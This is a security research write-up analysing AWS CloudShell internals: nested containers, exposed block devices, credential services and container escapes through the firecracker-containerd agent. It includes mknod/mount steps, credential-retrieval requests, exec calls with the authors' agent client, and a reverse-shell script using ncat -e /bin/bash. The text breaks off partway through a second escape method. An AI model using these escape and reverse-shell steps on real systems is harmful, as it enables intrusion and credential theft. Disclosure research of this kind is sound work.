AWS CloudShell analysis: privileged container, exposed block devices and container escape(s)
OSRU @ Ronin
AWS CloudShell is a browser-based, pre-authenticated shell that you can launch directly from the AWS Management Console. It is essentially an ephemeral virtual machine with the AWS CLI and other development tools pre-installed.
The successful operation of AWS CloudShell depends on a number of things, including but not limited to credential management, service health checks, infrastructure logging (customer interactions are not logged by CloudShell), snapshots of the user’s home directory, and management of terminal sessions.
Since AWS CloudShell doesn’t provision any resources and doesn’t run in your own AWS account, and since you get a shell where you can run arbitrary commands, there’s nothing stopping you from exploring the runtime, the running processes and the accessible resources.
$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
cloudsh+ 1 0.5 1.2 333412 32632 ? Ssl 14:05 0:00 node /var/lib/amazon/cloudshell/entrypoint.js
cloudsh+ 13 0.0 0.1 13172 2924 ? S 14:05 0:00 /bin/sh -c env | grep -m 1 AWS_REGION | grep -Eo '[a-z0-9-]*' | sudo tee /etc/yum/vars/awsregion && sudo yum -y update --security
root 19 0.0 0.2 128900 7044 ? S 14:05 0:00 sudo yum -y update --security
root 20 44.6 1.5 337824 41396 ? R 14:05 0:02 /usr/bin/python /bin/yum -y update --security
cloudsh+ 26 0.0 0.1 13172 2792 pts/0 Ss+ 14:05 0:00 /bin/bash -c cd ~ && tmux -l -f /var/lib/amazon/cloudshell/tmux.conf new-session -A -D -s 53d3a93f-2b80-4e9c-99cf-791bf8429d99
cloudsh+ 31 0.0 0.0 22360 2580 pts/0 S+ 14:05 0:00 tmux -l -f /var/lib/amazon/cloudshell/tmux.conf new-session -A -D -s 53d3a93f-2b80-4e9c-99cf-791bf8429d99
cloudsh+ 33 0.0 0.1 22508 3052 ? Ss 14:05 0:00 tmux -l -f /var/lib/amazon/cloudshell/tmux.conf new-session -A -D -s 53d3a93f-2b80-4e9c-99cf-791bf8429d99
cloudsh+ 34 0.0 0.1 13412 3340 pts/1 Ss 14:05 0:00 -bash
cloudsh+ 51 0.0 0.1 51392 3784 pts/1 R+ 14:05 0:00 ps aux
It appears that tmux is used for terminal session management, which likely allows managing and restoring shell sessions across the multiple tabs that CloudShell supports. We can also see that root access is allowed: you should be able to run commands as root using sudo.
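A quick check (ours, not part of the listing above) confirms the unrestricted root access:
# should report uid=0(root) without prompting for a password
sudo id
# and the sudoers policy should show what is allowed
sudo -l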
Looking at the cgroup for PID 1 confirms that we’re inside a Docker container.
$ cat /proc/1/cgroup
11:net_cls,net_prio:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
10:devices:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
9:pids:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
8:perf_event:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
7:freezer:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
6:memory:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
5:cpuset:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
4:hugetlb:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
3:cpu,cpuacct:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
2:blkio:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
1:name=systemd:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
Retrieving the instance metadata reveals that we’re inside a Firecracker microVM. Notice the Server response header with the value Firecracker API.
$ curl -v http://169.254.169.254/
* processing: http://169.254.169.254/
* Trying 169.254.169.254:80...
* Connected to 169.254.169.254 (169.254.169.254) port 80
> GET / HTTP/1.1
> Host: 169.254.169.254
> User-Agent: curl/8.2.1
> Accept: */*
>
< HTTP/1.1 200
< Server: Firecracker API
< Connection: keep-alive
< Content-Type: application/json
< Content-Length: 64
<
TMDSEndpoints/
containers/
roles/
stats/
task/
taskMemLimitInMiB
Another metadata API, for ECS, is also accessible and can be used to list the running containers:
$ curl -s http://169.254.170.2/v2/metadata | jq -r '.Containers[] | "\(.Name): \(.DockerId) (\(.Image))"'
moontide-wait-for-all: d65374b73fef4c638c14941111bf71aa-65406418 (275080008720.dkr.ecr.eu-west-1.amazonaws.com/mde-base-image:flat-base-2022-10-31-ad696c3a-patched)
moontide-controller: d65374b73fef4c638c14941111bf71aa-661465391 (275080008720.dkr.ecr.eu-west-1.amazonaws.com/mde-base-image:flat-base-2022-10-31-ad696c3a-patched)
moontide-base: d65374b73fef4c638c14941111bf71aa-3147462862 (275080008720.dkr.ecr.eu-west-1.amazonaws.com/mde-base-image:flat-base-2022-10-31-ad696c3a-patched)
If you look at the DockerId for the containers and match them against the cgroup result we got earlier from /proc/1/cgroup, you’ll see that we’re dealing with a nested container scenario: the CloudShell container we’re in is running inside another container, moontide-base.
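A quick way to confirm the nesting (an illustrative check on our part, not from the original analysis):
# grab the ECS container ID that appears just before "docker" in our cgroup path
PARENT_ID=$(awk -F/ 'NR==1 {print $(NF-2)}' /proc/1/cgroup)
# look that ID up in the ECS task metadata; it should resolve to moontide-base
curl -s http://169.254.170.2/v2/metadata \
  | jq -r --arg id "$PARENT_ID" '.Containers[] | select(.DockerId==$id) | .Name'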
Looking at the mounts within CloudShell shows the typical Docker mounts along with some interesting writable mounts. One such example is /aws/mde/.
$ mount
overlay on / type overlay (rw,relatime,lowerdir=/store/task-var-lib-docker/overlay2/l/STOGWX2COR7GWT34VQNE32NJZK:/store/task-var-lib-docker/overlay2/l/QXYDLYJUXGXTVQ6RDHAVDCD4A4:/store/task-var-lib-docker/overlay2/l/SLP2GIBHAAFRRB3W2R7BLQG3GY:/store/task-var-lib-docker/overlay2/l/56IECAAWKYKWJX2XIJVZMEEWTZ:/store/task-var-lib-docker/overlay2/l/IQLJZN5LQYC5VW55PTIHB25W2H:/store/task-var-lib-docker/overlay2/l/DYERYV3UXNAM27LPQSY5JPUOOI:/store/task-var-lib-docker/overlay2/l/5DVG56VOCRLZ7ZCRPDYLZI633Z:/store/task-var-lib-docker/overlay2/l/MPK5376WSR4EQCSMJKMEG72DAA:/store/task-var-lib-docker/overlay2/l/DLQ7G6KTP5CEINIEIXDDC7EPUR:/store/task-var-lib-docker/overlay2/l/QC76JNSL3AFYGTDYIEOL7FLPDF:/store/task-var-lib-docker/overlay2/l/F7NAPWUW44JGWXPARLQKQ5DOZM,upperdir=/store/task-var-lib-docker/overlay2/0be089ce8a700c3a49ddea177c9df9dd6afcae459ea27aef8791aed9e4b67858/diff,workdir=/store/task-var-lib-docker/overlay2/0be089ce8a700c3a49ddea177c9df9dd6afcae459ea27aef8791aed9e4b67858/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
.
.
/dev/vde on /aws/mde/ide-runtimes type ext4 (rw,relatime,data=ordered)
/dev/vde on /aws/mde/mde type ext4 (rw,relatime,data=ordered)
/dev/vde on /aws/mde/credential-helper type ext4 (rw,relatime,data=ordered)
/dev/vde on /aws/mde/logs type ext4 (rw,relatime,data=ordered)
Looking at the logs in /aws/mde/logs/ reveals that a container for the Docker image scallop-customer-image, the CloudShell runtime, is being run under the name devfile-cloudshell-runtime-1.
$ tail -12 /aws/mde/logs/devfileCommand.log
33f4ee6a8911 Extracting [==================================================>] 82.22MB/82.22MB
33f4ee6a8911 Pull complete
cloudshell-runtime Pulled
Container devfile-cloudshell-runtime-1 Creating
Container devfile-cloudshell-runtime-1 Created
Container devfile-cloudshell-runtime-1 Starting
Container devfile-cloudshell-runtime-1 Started
'{"Containers":"N/A","CreatedAt":"2023-09-26 08:16:20 +0000 UTC","CreatedSince":"30 hours ago","Digest":"sha256:5f31599ad7a35253ff57c0081bb0a385217cad862cc65f511be06a9f1d99b24e","ID":"cacec4bdbfc7","Repository":"887014871991.dkr.ecr.eu-west-1.amazonaws.com/scallop-customer-image","SharedSize":"N/A","Size":"2.86GB","Tag":"latest-patched","UniqueSize":"N/A","VirtualSize":"2.856GB"}'
Container devfile-cloudshell-runtime-1 Creating
Container devfile-cloudshell-runtime-1 Created
Container devfile-cloudshell-runtime-1 Starting
Container devfile-cloudshell-runtime-1 Started
Putting it all together, this is what we think the runtime infrastructure looks like.
Firecracker microVM
(firecracker-containerd)
|_ moontide-controller
|_ moontide-wait-for-all
|_ moontide-base -> docker
|_ scallop-customer-image
|_ tmux session
(this is what customers get access to)
Exposed Services
Running netstat to find the listening ports reveals a bunch of services that aren’t actually running in the container we’re in. These are visible and accessible because, we assume, the network namespace is shared between devfile-cloudshell-runtime-1 (the one we’re in), the parent container (moontide-base) and its siblings.
$ sudo netstat -anp | grep LISTEN
tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1338 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1339 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1340 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1341 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1342 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:51679 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3010 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3011 0.0.0.0:* LISTEN -
tcp6 0 0 :::5355 :::* LISTEN -
unix 2 [ ACC ] STREAM LISTENING 6153 - /var/run/docker.sock
unix 2 [ ACC ] STREAM LISTENING 9447 - /aws/mde/.controller/activity.sock
unix 2 [ ACC ] STREAM LISTENING 41003 - /aws/mde/.controller/activity.sock
unix 2 [ ACC ] STREAM LISTENING 41007 - /aws/mde/.controller/mde.sock
unix 2 [ ACC ] STREAM LISTENING 39189 - /run/containerd/s/5fbc156aea7531a97b62de7cf2b4d77235dd3ea97f2989125ae58b230e3aed5b
unix 2 [ ACC ] STREAM LISTENING 40473 33/tmux /tmp/tmux-1000/default
unix 2 [ ACC ] STREAM LISTENING 5407 - /var/run/docker/libnetwork/4805c2472257.sock
unix 2 [ ACC ] STREAM LISTENING 1109 - /run/systemd/journal/stdout
unix 2 [ ACC ] SEQPACKET LISTENING 1123 - /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 4467 - /var/lib/amazon/ssm/ipc/health
unix 2 [ ACC ] STREAM LISTENING 4469 - /var/lib/amazon/ssm/ipc/termination
unix 2 [ ACC ] STREAM LISTENING 639 - /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 5336 - /var/run/docker/containerd/containerd-debug.sock
unix 2 [ ACC ] STREAM LISTENING 5338 - /var/run/docker/containerd/containerd.sock.ttrpc
unix 2 [ ACC ] STREAM LISTENING 5340 - /var/run/docker/containerd/containerd.sock
unix 2 [ ACC ] STREAM LISTENING 5349 - /var/run/docker/metrics.sock
unix 2 [ ACC ] STREAM LISTENING 1510 - /run/dbus/system_bus_socket
The identification of these services is partial; it was done either by inspecting the block devices or by inspecting network traffic with tcpdump (a sketch of such a capture follows the list below).
tcp 127.0.0.1:1340 - log credentials
tcp 127.0.0.1:1341 - control plane proxy
tcp 127.0.0.1:1342 - SSH to cloudshell container
tcp 127.0.0.1:51679 - metadata-server / DNAT from 169.254.170.2
tcp 127.0.0.1:3010 - commands (ssm talks to this)
tcp 127.0.0.1:3011 - 3010 forwards to this port
tcp 127.0.0.1:1338 - container credentials
tcp 127.0.0.1:1339 - mde API
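As an illustration of the traffic-inspection part (our sketch; the interface and port filter are assumptions), watching the loopback interface while using CloudShell shows which local service each action ends up hitting:
# print payloads of loopback traffic to the credential and proxy services
sudo tcpdump -i lo -A -nn 'tcp port 1338 or tcp port 1340 or tcp port 1341'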
Accessible Block Devices
Running lsblk in the CloudShell console shows several disks that are present but not directly mountable.
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
loop0 7:0 0 1G 0 loop /home/cloudshell-user
vda 254:0 0 2G 0 disk
vdb 254:16 0 10G 0 disk
vdc 254:32 0 10G 0 disk
vdd 254:48 0 10G 0 disk
vde 254:64 0 20.4G 0 disk /aws/mde/logs
The device nodes aren’t present in /dev, but their entries do exist in /sys/dev/block/, so the nodes can be recreated and then mounted inside the CloudShell container.
# run these as root
mkdir -p /mounts/vda
mkdir -p /mounts/vdb
mkdir -p /mounts/vdc
mkdir -p /mounts/vdd
mkdir -p /mounts/vde
mknod /tmp/vda b 254 0
mknod /tmp/vdb b 254 16
mknod /tmp/vdc b 254 32
mknod /tmp/vdd b 254 48
mknod /tmp/vde b 254 64
mount -t ext4 /tmp/vda /mounts/vda
mount -t ext4 /tmp/vdb /mounts/vdb
mount -t ext4 /tmp/vdc /mounts/vdc
mount -t ext4 /tmp/vdd /mounts/vdd
mount -t ext4 /tmp/vde /mounts/vde
The contents are very interesting; after inspection, the disks were identified as:
vda - root disk for the Firecracker microVM
vdb - \
vdc - | - disks for moontide containers in the ECS task
vdd - /
vde - shared disk with mde utils
The environment variables for the moontide containers running in the task can be found at:
cat /mounts/vda/container/*/config.json | jq '.process.env'
These variables reveal how the environment is configured. They also contain auth tokens for interacting with some of the services, e.g. the services exposed at ports 3010 and 3011. CVS_POLICY_TYPE and CALLBACK_SERVICE_ENDPOINT_DNS define the type and location of the credential service.
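For example, the two credential-service variables can be pulled out of the container configs like this (a sketch, building on the config.json command above):
# list CVS_POLICY_TYPE and CALLBACK_SERVICE_ENDPOINT_DNS across all containers
cat /mounts/vda/container/*/config.json \
  | jq -r '.process.env[] | select(startswith("CVS_POLICY_TYPE") or startswith("CALLBACK_SERVICE_ENDPOINT_DNS"))'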
The following confirms that the vda disk is the rootfs for the Firecracker microVM.
$ cat /mounts/vda/etc/image-id
image_name="amzn2-firecracker-fargate"
image_version="2"
image_arch="x86_64"
image_file="amzn2-firecracker-fargate-2.01.2023-0808-2234-x86_64.ext4"
image_stamp="8c6b-a3b1"
image_date="20230808223512"
recipe_name="amzn2 firecracker"
recipe_id="20759e13-0635-8460-33e6-6e61-356e-9be3-7326d45f"
SSM also appears to play an important role in making CloudShell work. The SSM agent logs show how the CloudShell instance gets updated and receives instructions through SSM. One would be able to see health check, update and exec-client calls.
The update calls are interesting and show details of the credential and snapshot locations.
cat /mounts/vde/_containers/*/upperdir/var/log/amazon/ssm/amazon-ssm-agent.log | grep update
2023-07-30 01:26:46 INFO [ssm-agent-worker] [MessageService] [MGSInteractor] Parsing AgentMessage 50f367f7-1030-459e-a859-747920f576de, Payload: {"schemaVersion":1,"taskId":"680947685022:1690672863717378567-0fcf795684bfd9a6a","topic":"test_topic","content":"{\"RunAsUser\":\"\",\"Parameters\":{\"command\":\"curl -X POST -H \\\"Authorization: fff...dec\\\" localhost:3010/commands/update -d eyJzb3VyY2VDb2Rl...lZmVycmVkTW91bnQiOmZhbHNlfX0\u003d\"},\"DocumentContent\":{\"schemaVersion\":\"1.0\",\"inputs\":{\"cloudWatchEncryptionEnabled\":true,\"s3EncryptionEnabled\":true,\"s3BucketName\":\"\",\"kmsKeyId\":\"\",\"s3KeyPrefix\":\"\",\"cloudWatchLogGroupName\":\"\"},\"description\":\"Document to run single interactive command on an instance\",\"sessionType\":\"InteractiveCommands\",\"parameters\":{\"command\":{\"description\":\"The command to run on the instance\",\"type\":\"String\"}},\"properties\":{\"linux\":{\"runAsElevated\":false,\"commands\":\"{{command}}\"},\"windows\":{\"runAsElevated\":false,\"commands\":\"{{command}}\"},\"macos\":{\"runAsElevated\":false,\"commands\":\"{{command}}\"}}},\"SessionOwner\":\"arn:aws:sts::680947685022:assumed-role/moontide-cell-role/1690672863717378567\",\"SessionId\":\"1690672863717378567-0fcf795684bfd9a6a\",\"DocumentName\":\"AWS-StartInteractiveCommand\"}"}
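The update payload itself is the base64 blob passed with -d in the logged command. It can be decoded like so (a sketch; the blob is copied into a shell variable first):
# UPDATE_PAYLOAD_B64 holds the eyJzb3VyY2VDb2Rl... string from the log line
echo "$UPDATE_PAYLOAD_B64" | base64 -d | jq .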
A decoded update instance message looks like this:
{
"sourceCode": null,
"s3PersistenceConfiguration": {
"snapshotObjectArn": "arn:aws:s3:::mdesnap275080008720/snapshots/887014871991/{environmentId}/home",
"sizeInGiB": null
},
"credentialsS3ObjectARN": "arn:aws:s3:::mdecred275080008720/credentials/887014871991/{environmentId}/aws",
"taskIDS3ObjectARN": "arn:aws:s3:::mdesnap275080008720/taskids/887014871991/{environmentId}/taskid",
"maximumRuntimeMinutes": 1210,
"inactivityTimeoutMinutes": 0,
"externalID": "{environmentId}",
"instanceType": "ENVIRONMENT",
"clientID": "887014871991",
"kmsKeyArn": "arn:aws:kms:eu-west-1:887014871991:key/{keyId}",
"environmentARN": "arn:aws:mde:eu-west-1:887014871991:/environments/{environmentId}",
"Ides": null,
"enableCawsCredentialsLoading": false,
"enableCredentialsUpdater": true,
"envConfig": {
"instanceId": "{instanceId}",
"externalId": "{environmentId}",
"warmPoolId": "wp-3d8d006f0aa54475a623419ccbd580e5",
"clientId": "887014871991",
"instanceType": "ENVIRONMENT",
"maximumRuntimeInMinutes": 1210,
"commandRunnerToken": "fff...dec",
"credentialsUpdaterEnabled": true,
"ssh": {
"port": 1342
},
"customerMetrics": {
"enabled": false
},
"customerLogs": {
"enabled": false
},
"httpProxyConfig": {
"enabled": false,
"httpProxyAccountId": "314344395930",
"throttlingEnabled": false
},
"inactivity": {
"type": "NETWORK",
"timeoutInMinutes": 0
},
"inactivityTrackingType": "NETWORK",
"s3Persistence": {
"snapshotObjectArn": "arn:aws:s3:::mdesnap275080008720/snapshots/887014871991/{environmentId}/home",
"sizeInBytes": 0,
"KMSKeyArn": "arn:aws:kms:eu-west-1:887014871991:key/{keyId}",
"taskIdObjectArn": "arn:aws:s3:::mdesnap275080008720/taskids/887014871991/{environmentId}/taskid",
"mountPoint": "/cloudshell-user-home:/home/cloudshell-user"
},
"waitDeferredMount": false
}
}
Credentials
Task Credentials
The credentials for the following roles can be obtained from the Firecracker metadata service:
arn:aws:sts::{cloudshellAccount}:assumed-role/moontide-task-role-control-plane/{instanceId}
arn:aws:sts::{cloudshellAccount}:assumed-role/moontide-task-execution-role/{instanceId}
The task role has access to pull mde-base-image, which is expected. This image is used for all three containers in the task.
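One way to sanity-check that access without a Docker daemon is an ECR API call (our sketch; it assumes the task-role credentials are exported as the standard AWS_* environment variables, and the registry/repository/tag are taken from the container listing above):
# ecr:BatchGetImage is part of the pull permission set
aws ecr batch-get-image --region eu-west-1 \
  --registry-id 275080008720 \
  --repository-name mde-base-image \
  --image-ids imageTag=flat-base-2022-10-31-ad696c3a-patched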
User Credentials
When a cloudshell:PutCredentials call is made from the browser or the AWS CLI, the credentials are stored in a remote credential store against the specific CloudShell instance, from where they can later be retrieved by the credential services within CloudShell.
One such remote credential store exists at https://kztbj7an49.execute-api.eu-west-1.amazonaws.com/prod (for eu-west-1); the endpoint /{instanceId}/credentials/role is used to fetch the credentials stored by the cloudshell:PutCredentials call. The request must be signed with moontide-task-role-control-plane credentials.
This endpoint was identified by inspecting the env variable CALLBACK_SERVICE_ENDPOINT_DNS for one of the parent containers. You might also be able to see it by inspecting the network traffic.
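A hypothetical sketch of such a signed request (the exported credential variable names and the instance ID variable are ours; recent curl can do the SigV4 signing itself):
# sign with the moontide-task-role-control-plane credentials against execute-api
curl -s "https://kztbj7an49.execute-api.eu-west-1.amazonaws.com/prod/${INSTANCE_ID}/credentials/role" \
  --user "${AWS_ACCESS_KEY_ID}:${AWS_SECRET_ACCESS_KEY}" \
  -H "x-amz-security-token: ${AWS_SESSION_TOKEN}" \
  --aws-sigv4 "aws:amz:eu-west-1:execute-api"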
If you look at env within CloudShell, you’ll see that AWS_CONTAINER_CREDENTIALS_FULL_URI points to a local service. The AWS CLI uses the value of this variable to get container credentials, as highlighted in the AWS documentation.
AWS_CONTAINER_CREDENTIALS_FULL_URI=http://localhost:1338/latest/meta-data/container/security-credentials
The service at port 1338 then calls the remote credential store described above to fetch the user credentials.
AWS CLI/SDK -> localhost:1338 -> remote credential store
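You can observe the first hop of this flow directly (illustrative; it simply mimics the GET request the CLI performs against the variable):
# ask the local credential service for the same credentials the CLI would use
curl -s "$AWS_CONTAINER_CREDENTIALS_FULL_URI"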
Other Credentials
The credential service described above is also used to fetch other credentials necessary for the CloudShell operations.
/{instanceId}/credentials/logs
- arn:aws:sts::{cloudshellAccount}:assumed-role/MDEBootstrapRole/logs_{environmentId}
/{instanceId}/credentials/docker
- arn:aws:sts::{cloudshellAccount}:assumed-role/MDEBootstrapRole/ecr_{environmentId}
- used for pulling scallop-customer-image
/{instanceId}/credentials/snapshot
- arn:aws:sts::{cloudshellAccount}:assumed-role/moontide-snapshot-role-control-plane/snapshot_{environmentId}
- manages the CloudShell home directory snapshot in S3
/{instanceId}/credentials/hightideRole
- arn:aws:sts::{cloudshellAccount}:assumed-role/HightideS3LoggingRole/hightidelogs_{environmentId}
Container Escape(s)
After analysing the vda disk, we can see that the Firecracker microVM receives instructions from containerd through the Firecracker agent. The agent exposes a VSOCK socket at port 10789 and runs a TTRPC server.
The CloudShell container can also access this VSOCK socket using CID 0.
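A quick reachability check from inside CloudShell (our sketch; it needs a socat build with VSOCK support, which is not installed by default, and since the agent speaks TTRPC a raw connection won’t get a meaningful reply):
# connect to the firecracker-containerd agent's VSOCK listener on CID 0, port 10789
socat - VSOCK-CONNECT:0:10789 < /dev/null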
Agent TTRPC Services
The following services are exposed by the firecracker-containerd agent over VSOCK. They are intended to be used by the firecracker-containerd service on the actual host running the microVMs.
aws.firecracker.containerd.eventbridge.getter/GetEvent
containerd.task.v2.Task/State
containerd.task.v2.Task/Create
containerd.task.v2.Task/Start
containerd.task.v2.Task/Delete
containerd.task.v2.Task/Pids
containerd.task.v2.Task/Pause
containerd.task.v2.Task/Resume
containerd.task.v2.Task/Checkpoint
containerd.task.v2.Task/Kill
containerd.task.v2.Task/Exec
containerd.task.v2.Task/ResizePty
containerd.task.v2.Task/CloseIO
containerd.task.v2.Task/Update
containerd.task.v2.Task/Wait
containerd.task.v2.Task/Stats
containerd.task.v2.Task/Connect
containerd.task.v2.Task/Shutdown
IOProxy/State
IOProxy/Attach
DriveMounter/MountDrive
DriveMounter/UnmountDrive
We wrote a simple CLI to interact with the Firecracker agent; it can be found at: https://github.com/dehydr8/firecracker-containerd-agent-client/
./firecracker-containerd-agent-client call --service containerd.task.v2.Task --method Pids '{"id":"<container-id>"}'
2023/07/30 02:04:15 {"processes":[{"pid":1061},{"pid":1073},{"pid":1122},{"pid":1123},{"pid":1124},{"pid":1130},{"pid":1140},{"pid":1179},{"pid":13654},{"pid":13655},{"pid":29376},{"pid":29384}]}
Escaping to the moontide containers
Escaping is easy, as we can execute any command in any of the running containers using containerd.task.v2.Task/Exec.
The command output can be seen in two ways:
- Since we already have access to the Firecracker microVM rootfs at vda, we can supply any path under /tmp as our stdout and stderr. We can later read it at /mounts/vda/tmp/<exec-id>.stdout
- firecracker-containerd-agent-client now has support for IOProxy, which uses VSOCK ports for forwarding stdin, stdout and stderr
# without IO proxy
$ ./firecracker-containerd-agent-client exec --container_id <container> /usr/bin/id
2023/09/26 14:33:54 Execution ID: a678160d-3719-4c1a-8d64-eb8488f91286
2023/09/26 14:33:55 Exec call successfull, starting process...
2023/09/26 14:33:56 Command executed with PID: 12263
$ cat /mounts/vda/tmp/a678160d-3719-4c1a-8d64-eb8488f91286.stdout
uid=0(root) gid=0(root) groups=0(root)
# with IO proxy
$ ./firecracker-containerd-agent-client exec --container_id <container> --io /usr/bin/id
2023/09/26 14:35:33 Execution ID: 34bf4762-44ff-4821-81ab-891fc76ebab8
2023/09/26 14:35:34 Proxy attached...
2023/09/26 14:35:34 Exec call successfull, starting process...
2023/09/26 14:35:35 Command executed with PID: 12984
uid=0(root) gid=0(root) groups=0(root)
An interactive shell can be opened using the IOProxy support along with --tty.
$ export MDE_BASE_CONTAINER=$(curl -s http://169.254.170.2/v2/metadata | jq -r '.Containers[] | select(.Name=="moontide-base") | .DockerId')
$ ./firecracker-containerd-agent-client exec --container_id $MDE_BASE_CONTAINER --io --tty /usr/bin/bash
2023/09/26 14:37:28 Execution ID: d15c9a0d-8d42-4fe7-9a0c-38187e4d90c6
2023/09/26 14:37:29 Proxy attached...
2023/09/26 14:37:29 Exec call successfull, starting process...
2023/09/26 14:37:29 Command executed with PID: 13810
bash-4.2# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
5f6aad52847e 887014871991.dkr.ecr.eu-west-1.amazonaws.com/scallop-customer-image:latest-patched "node /var/lib/amazo…" 4 minutes ago Up 4 minutes devfile-cloudshell-runtime-1
bash-4.2# cat /etc/image-id
image_name="amzn2-container-raw"
image_version="2"
image_arch="x86_64"
image_file="amzn2-container-raw-2.0.20230822.0-x86_64"
image_stamp="35bb-cd11"
image_date="20230822182528"
recipe_name="amzn2 container"
recipe_id="11ed84f7-ea52-6dd5-259b-f269-e79c-e2eb-155c2d3f"
Escaping to the Firecracker microVM
The Firecracker microVM runs in a jailed environment on the underlying host. This microVM is responsible for running the ECS tasks being orchestrated by firecracker-containerd, which means running the moontide containers for CloudShell. Each microVM instance is unique to the customer’s CloudShell session and gets destroyed shortly after the session ends.
Escaping to it can be done in two ways:
- Supplying a custom binary path for stdout when running a command. This binary must be present on the microVM.
- Creating a new privileged container with pid=host and escaping to the host namespace.
The Hard Way
If we look at the state of the root execution (whose exec ID is the empty string) for any of the containers, we see:
$ ./firecracker-containerd-agent-client call --service containerd.task.v2.Task --method State '{"id":"{containerId}"}'
2023/07/30 02:13:50 {"id":"{containerId}","bundle":"/container/{containerId}","pid":1061,"status":2,"stdout":"binary:///sbin/shim-loggers-for-containerd?--awslogs-create-group=...--mode=blocking","stderr":"binary:///sbin/shim-loggers-for-containerd?--awslogs-create-group=...--mode=blocking","exited_at":{"seconds":-62135596800}}
The stdout and stderr streams are sent to the /sbin/shim-loggers-for-containerd binary on the Firecracker microVM. In Exec, we can supply our own binary paths to handle these streams. To make it easier, since we already have access to vda, we can place the ncat executable and a file (let’s call it rsh.sh) in /tmp with the following contents:
#!/bin/bash
/tmp/ncat <ip> <port> -e /bin/bash &
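One way to stage these files (our sketch; it assumes the vda mount created earlier is still in place at /mounts/vda and that an ncat binary has been downloaded into the current directory):
# /mounts/vda/tmp on the CloudShell side is /tmp on the microVM
sudo cp ./ncat ./rsh.sh /mounts/vda/tmp/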
Make them executable and then run:
$ ./firecracker-containerd-agent-client exec --container_id <any-container-id> --stdout binary:///tmp/rsh.sh /usr/bin/id
# we should get a reverse shell from the Firecracker microVM
$ ls -lah /
total 77K
dr-xr-xr-x 21 root root 4.0K Jul 30 00:54 .
dr-xr-xr-x 21 root root 4.0K Jul 30 00:54 ..
lrwxrwxrwx 1 root root 7 Jun 29 01:41 bin -> usr/bin
dr-xr-xr-x 2 root root 4.0K Apr 9 2019 boot
drwxrwxrwx 5 root root 4.0K Jul 30 00:56 container
drwxr-xr-x 11 root root 2.6K Jul 30 00:54 dev
drwxr-xr-x 51 root root 4.0K Jun 29 01:41 etc
drwxr-xr-x 2 root root 4.0K Apr 9 2019 home
lrwxrwxrwx 1 root root 7 Jun 29 01:41 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jun 29 01:41 lib64 -> usr/lib64
drwxr-xr-x 2 root root 4.0K Jun 29 01:41 local
drwx------ 2 root root 16K Jun 29 01:41 lost+found
drwxr-xr-x 2 root root 4.0K Apr 9 2019 media
drwxr-xr-x 2 root root 4.0K Apr 9 2019 mnt
drwxr-xr-x 2 root root 4.0K Apr 9 2019 opt
dr-xr-xr-x 128 root root 0 Jul 30 00:54 proc
dr-xr-x--- 2 root root 4.0K Apr 9 2019 root
drwxr-xr-x 15 root root 360 Jul 30 00:54 run
lrwxrwxrwx 1 root root 8 Jun 29 01:41 sbin -> usr/sbin
drwxr-xr-x 2 root root 4.0K Apr 9 2019 srv
dr-xr-xr-x 12 root root 0 Jul 30 00:54 sys
drwxrwxrwt 9 root root 4.0K Jul 30 02:22 tmp
drwxr-xr-x 13 root root 4.0K Jun 29 01:41 usr
drwxr-xr-x 18 root root 4.0K Jul 30 00:54 var
drwxr-xr-x 11 root root 1.0K Jul 30 00:54 volume
The Easy Way
We can instruct the Firecracker agent to create a new runc container with elevated privileges. To do this, we must first have access to an image bundle and a rootfs. Since we can’t really pull new images*, we must use the existing ones that are present on the microVM.
